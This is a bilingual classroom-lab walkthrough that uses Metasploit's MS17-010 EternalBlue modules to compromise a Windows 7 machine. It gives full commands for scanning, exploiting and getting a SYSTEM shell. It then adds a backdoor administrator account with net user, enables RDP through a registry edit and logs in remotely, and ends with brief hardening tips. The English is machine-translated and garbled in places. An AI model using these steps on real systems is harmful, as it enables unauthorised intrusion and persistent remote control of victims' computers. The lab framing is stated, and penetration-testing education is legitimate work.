2019/4 / 18- - -
About kali linux using the MS17-010 "eternal blue" penetration attacks windows7, remote login effects.
And how to protect and so on.
This article is for classroom experiments, not criminal
introduce an "eternal blue"
“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。
恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,
只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
2, experimental environment preparation
(1) Windows7 open 445 port is enabled by default
to open 445 port provides easy access to a variety of local area network to share files in a folder or a shared printer
(2) kali linux with windows7 can ping each other, Windows7 off the firewall
3, penetration attacks embodiment
input msfconsole kali linux command, invoke the tool Metasploit
msfconsole
Then search ms17-010 this loophole
search ms17-010
Use ms17-010 vulnerability scanning module
use auxiliary/scanner/smb/smb_ms17_010
Then look at the options
show options
Besides setting up a target address
set rhosts 192.168.247.20
Look again, found to have been the target address (ip address of Windows7) is set to go up
show options
Now we launch this vulnerability scanning module
run
Found to be the host may be vulnerable to MS17-010 attack, also shows the version information of Windows7
192.168.247.20:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
Then again, enter the back, just return to the open state msfconsole
back
Search ms17-010 this loophole
search ms17-010
Use the "Eternal Blue" This module exploits
use exploit/windows/smb/ms17_010_eternalblue
Then look
show options
Besides setting up a target address
set rhosts 192.168.247.20
Look again, found to have been the target address (ip address of Windows7) is set to go up
show options
Now we are launching exploits this module
exploit
显示出下列这个信息后,enter(回车一下)
[+] 192.168.247.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.247.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.247.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
就进入了Windows7的shell界面
输入一下whoami,查看一下是谁在登录
会发现我们是系统的最高权限账户在登录。攻击完成。
4、kali Linux远程连接win7的攻击
先来查看一下Windows7的远程连接,是没有开启的。
我们可以使用kali linux利用MS17-010实现打开远程连接,并自己创建用户,来远程连接。
首先,我们已经攻击成功,并进入了Windows7的shell界面,然后做以下事情:
开始之前先解决一个乱码问题
(1)添加一个名字为snp的用户,密码snp
net user snp snp /add
(2)提升为管理员权限
net localgroup administrators snp /add
net localgroup administrators #注释:查看一下管理员组有没有自己刚刚添加的用户
(3)利用注册表,打开远程连接
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTsConnections /t REG_DWORD /d 00000000 /f
(4)在kali Linux中使用刚刚添加的用户远程连接Windows7
输入
rdesktop 192.168.247.20:3389
Then log in with a user account just added
click is
seen below this case, wait for a while.
Then the remote connection on the
security problem: how to protect?
1, both want to use the remote connection function, fear of being attacked, it would change my port number of remote connections
Windows7 registry modifications remote connection port number
(1) Open the Registry
Windows + r enter regedit
(2) to find this path ( 1), the modified 3389 4000
(2) find the path (2), 4000 to 3389 as modified, and then restart the computer.
2, prompted the need to update the system, to update, to avoid unscrupulous people exploit, do illegal things, and therefore we attacked
3, open the firewall, closed less frequently used ports.
☺ok, have any questions, please review the exchange (* ¯)¯)